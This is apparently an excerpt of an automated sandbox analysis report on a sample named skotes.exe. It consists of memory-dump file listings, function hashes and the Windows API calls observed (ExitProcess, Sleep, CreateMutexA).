Associated: 00000001.00000002.1716359573.0000000000B30000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716389672.0000000000B34000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716402818.0000000000B35000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716416174.0000000000B36000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716430256.0000000000B38000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716444634.0000000000B3A000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716458477.0000000000B3C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716475767.0000000000B45000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716489575.0000000000B46000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716502967.0000000000B47000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716516442.0000000000B48000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716534415.0000000000B62000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716548655.0000000000B64000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716562164.0000000000B66000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716575453.0000000000B67000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716590589.0000000000B6F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716605055.0000000000B74000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716618300.0000000000B75000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716634322.0000000000B79000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716652053.0000000000B8E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716665860.0000000000B91000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716679488.0000000000B92000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716693821.0000000000B96000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716709853.0000000000B9D000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716723700.0000000000BA0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716739036.0000000000BA7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716753525.0000000000BA8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716768335.0000000000BB0000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716781985.0000000000BB2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716797553.0000000000BC1000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716811021.0000000000BC2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716824525.0000000000BC4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716840776.0000000000BC7000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716854866.0000000000BCA000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716870428.0000000000BD1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716889647.0000000000BEE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716905345.0000000000BF3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716905345.0000000000C11000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716945909.0000000000C3F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716961725.0000000000C40000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716976615.0000000000C41000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1716991099.0000000000C44000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1717005843.0000000000C46000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1717022927.0000000000C56000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1717037791.0000000000C57000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_940000_skotes.jbxd

Yara matches

Similarity

API ID: Mtx_unlock
String ID:
API String ID: 1418687624-0
Opcode ID: 7b148c2b003a97e8dea58f50b479de28e2281468cc8c79e687fd16a7839bb334
Instruction ID: 6b5e46f16925be7a7e3cb63c6c2965e6b8f67c98710171b3e1068cc5c0adc39c
Opcode Fuzzy Hash: 7b148c2b003a97e8dea58f50b479de28e2281468cc8c79e687fd16a7839bb334
Instruction Fuzzy Hash: 8FA1E0B0A05305AFDB20DF75C844B6AB7B8FF59325F148269E815D7281EB31EA08CBD1

Analysis Process: skotes.exePID: 7872, Parent PID: 1044COMMON

Execution Graph

Execution Coverage:	1%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	0%
Total number of Nodes:	1890
Total number of Limit Nodes:	9

Executed Functions

Function 0097652B Relevance: 1.5, APIs: 1, Instructions: 24
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ExitProcess.KERNEL32(?,?,0097652A,?,?,?,?,?,00977661), ref: 00976567

Memory Dump Source

Source File: 00000002.00000002.1725053890.0000000000941000.00000040.00000001.01000000.00000007.sdmp, Offset: 00940000, based on PE: true

Associated: 00000002.00000002.1724966816.0000000000940000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1725053890.00000000009A2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1725135977.00000000009A9000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1725154631.00000000009AB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1725202801.00000000009B7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726505694.0000000000B0F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726999851.0000000000B11000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727138941.0000000000B24000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727138941.0000000000B30000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727347622.0000000000B34000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727447955.0000000000B35000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727463935.0000000000B36000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727509744.0000000000B38000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727541811.0000000000B3A000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727564744.0000000000B3C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727657950.0000000000B45000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727684532.0000000000B46000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727701099.0000000000B47000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727728553.0000000000B48000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727751037.0000000000B62000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727767350.0000000000B64000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727785108.0000000000B66000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727800965.0000000000B67000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727817001.0000000000B6F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727837711.0000000000B74000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727856845.0000000000B75000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727872250.0000000000B79000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727889948.0000000000B8E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727907759.0000000000B91000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727923278.0000000000B92000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727940364.0000000000B96000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727955443.0000000000B9D000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727970200.0000000000BA0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727987984.0000000000BA7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1728004036.0000000000BA8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1728022848.0000000000BB0000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1728037582.0000000000BB2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1728053959.0000000000BC1000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1728068720.0000000000BC2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1728086440.0000000000BC4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1728101761.0000000000BC7000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1728116754.0000000000BCA000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1728132799.0000000000BD1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1728155347.0000000000BEE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1728171850.0000000000BF3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1728171850.0000000000C11000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1728213831.0000000000C3F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1728232513.0000000000C40000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1728247730.0000000000C41000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1728263275.0000000000C44000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1728278033.0000000000C46000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1728295927.0000000000C56000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1728313232.0000000000C57000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_940000_skotes.jbxd

Yara matches

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: 3994cc5c9ad86e3edb6249d8d7c12186ef4a8aa67e95a793b24ed5786a52460a
Instruction ID: 312653cbe5e2827757defa40d81c23e08e0a983f5bbc3ab070ea3a022ddba86f
Opcode Fuzzy Hash: 3994cc5c9ad86e3edb6249d8d7c12186ef4a8aa67e95a793b24ed5786a52460a
Instruction Fuzzy Hash: 95E0C232140648AFCF367F18C909E5E3BAEEFA1749F008800FA1C46636CB35EE81D690

Function 00949BA5 Relevance: 3.1, APIs: 2, Instructions: 140
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00000064), ref: 0094A963
CreateMutexA.KERNELBASE(00000000,00000000,009A3254), ref: 0094A981

Memory Dump Source

Source File: 00000002.00000002.1725053890.0000000000941000.00000040.00000001.01000000.00000007.sdmp, Offset: 00940000, based on PE: true

Associated: 00000002.00000002.1724966816.0000000000940000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1725053890.00000000009A2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1725135977.00000000009A9000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1725154631.00000000009AB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1725202801.00000000009B7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726505694.0000000000B0F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726999851.0000000000B11000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727138941.0000000000B24000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727138941.0000000000B30000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727347622.0000000000B34000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727447955.0000000000B35000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727463935.0000000000B36000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727509744.0000000000B38000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727541811.0000000000B3A000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727564744.0000000000B3C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727657950.0000000000B45000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727684532.0000000000B46000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727701099.0000000000B47000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727728553.0000000000B48000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727751037.0000000000B62000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727767350.0000000000B64000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727785108.0000000000B66000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727800965.0000000000B67000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727817001.0000000000B6F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727837711.0000000000B74000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727856845.0000000000B75000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727872250.0000000000B79000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727889948.0000000000B8E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727907759.0000000000B91000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727923278.0000000000B92000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727940364.0000000000B96000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727955443.0000000000B9D000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727970200.0000000000BA0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727987984.0000000000BA7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1728004036.0000000000BA8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1728022848.0000000000BB0000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1728037582.0000000000BB2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1728053959.0000000000BC1000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1728068720.0000000000BC2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1728086440.0000000000BC4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1728101761.0000000000BC7000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1728116754.0000000000BCA000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1728132799.0000000000BD1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1728155347.0000000000BEE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1728171850.0000000000BF3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1728171850.0000000000C11000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1728213831.0000000000C3F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1728232513.0000000000C40000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1728247730.0000000000C41000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1728263275.0000000000C44000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1728278033.0000000000C46000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1728295927.0000000000C56000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1728313232.0000000000C57000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_940000_skotes.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID:
API String ID: 1464230837-0
Opcode ID: df15dc2af61206c0ee4f5946d95a0fddb845ed757001c2ea5148d91bbd5a1558
Instruction ID: a648839696e8c0cf3f10add56eacf1037ee89d28514772aa477e730fd01062a4
Opcode Fuzzy Hash: df15dc2af61206c0ee4f5946d95a0fddb845ed757001c2ea5148d91bbd5a1558
Instruction Fuzzy Hash: 703159716442008BFB18DB78DCCAFAEB7A6EFC2311F248218E414D77D6D7799A808761

Function 00949F44 Relevance: 3.1, APIs: 2, Instructions: 137
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00000064), ref: 0094A963
CreateMutexA.KERNELBASE(00000000,00000000,009A3254), ref: 0094A981

Memory Dump Source

Source File: 00000002.00000002.1725053890.0000000000941000.00000040.00000001.01000000.00000007.sdmp, Offset: 00940000, based on PE: true

Associated: 00000002.00000002.1724966816.0000000000940000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1725053890.00000000009A2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1725135977.00000000009A9000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1725154631.00000000009AB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1725202801.00000000009B7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726505694.0000000000B0F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726999851.0000000000B11000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727138941.0000000000B24000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727138941.0000000000B30000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727347622.0000000000B34000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727447955.0000000000B35000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727463935.0000000000B36000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727509744.0000000000B38000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727541811.0000000000B3A000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727564744.0000000000B3C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727657950.0000000000B45000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727684532.0000000000B46000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727701099.0000000000B47000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727728553.0000000000B48000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727751037.0000000000B62000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727767350.0000000000B64000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727785108.0000000000B66000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727800965.0000000000B67000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727817001.0000000000B6F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727837711.0000000000B74000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727856845.0000000000B75000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727872250.0000000000B79000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727889948.0000000000B8E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727907759.0000000000B91000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727923278.0000000000B92000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727940364.0000000000B96000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727955443.0000000000B9D000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727970200.0000000000BA0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727987984.0000000000BA7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1728004036.0000000000BA8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1728022848.0000000000BB0000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1728037582.0000000000BB2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1728053959.0000000000BC1000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1728068720.0000000000BC2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1728086440.0000000000BC4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1728101761.0000000000BC7000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1728116754.0000000000BCA000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1728132799.0000000000BD1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1728155347.0000000000BEE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1728171850.0000000000BF3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1728171850.0000000000C11000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1728213831.0000000000C3F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1728232513.0000000000C40000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1728247730.0000000000C41000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1728263275.0000000000C44000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1728278033.0000000000C46000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1728295927.0000000000C56000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1728313232.0000000000C57000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_940000_skotes.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID:
API String ID: 1464230837-0
Opcode ID: a54c73489f25c561e376697c25b78243bf5b2a1ccb1f633fec9668ffb9e1037c
Instruction ID: fb654f3def85c0de8ea970efd067d5a53c721708a7ae9fa96dce1415218fea62
Opcode Fuzzy Hash: a54c73489f25c561e376697c25b78243bf5b2a1ccb1f633fec9668ffb9e1037c
Instruction Fuzzy Hash: DF3159327441008BEB18DB78DC89FADB766EFC6310F248758E414EB6D2D7399D848752

Function 0094A079 Relevance: 3.1, APIs: 2, Instructions: 136
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00000064), ref: 0094A963
CreateMutexA.KERNELBASE(00000000,00000000,009A3254), ref: 0094A981

Memory Dump Source

Source File: 00000002.00000002.1725053890.0000000000941000.00000040.00000001.01000000.00000007.sdmp, Offset: 00940000, based on PE: true

Associated: 00000002.00000002.1724966816.0000000000940000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1725053890.00000000009A2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1725135977.00000000009A9000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1725154631.00000000009AB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1725202801.00000000009B7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726505694.0000000000B0F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726999851.0000000000B11000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727138941.0000000000B24000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727138941.0000000000B30000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727347622.0000000000B34000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727447955.0000000000B35000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727463935.0000000000B36000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727509744.0000000000B38000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727541811.0000000000B3A000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727564744.0000000000B3C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727657950.0000000000B45000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727684532.0000000000B46000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727701099.0000000000B47000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727728553.0000000000B48000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727751037.0000000000B62000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727767350.0000000000B64000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727785108.0000000000B66000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727800965.0000000000B67000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727817001.0000000000B6F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727837711.0000000000B74000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727856845.0000000000B75000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727872250.0000000000B79000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727889948.0000000000B8E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727907759.0000000000B91000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727923278.0000000000B92000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727940364.0000000000B96000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727955443.0000000000B9D000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727970200.0000000000BA0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727987984.0000000000BA7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1728004036.0000000000BA8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1728022848.0000000000BB0000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1728037582.0000000000BB2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1728053959.0000000000BC1000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1728068720.0000000000BC2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1728086440.0000000000BC4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1728101761.0000000000BC7000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1728116754.0000000000BCA000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1728132799.0000000000BD1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1728155347.0000000000BEE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1728171850.0000000000BF3000.00000040.00000001.01000000.00000007.sdmpDownload File
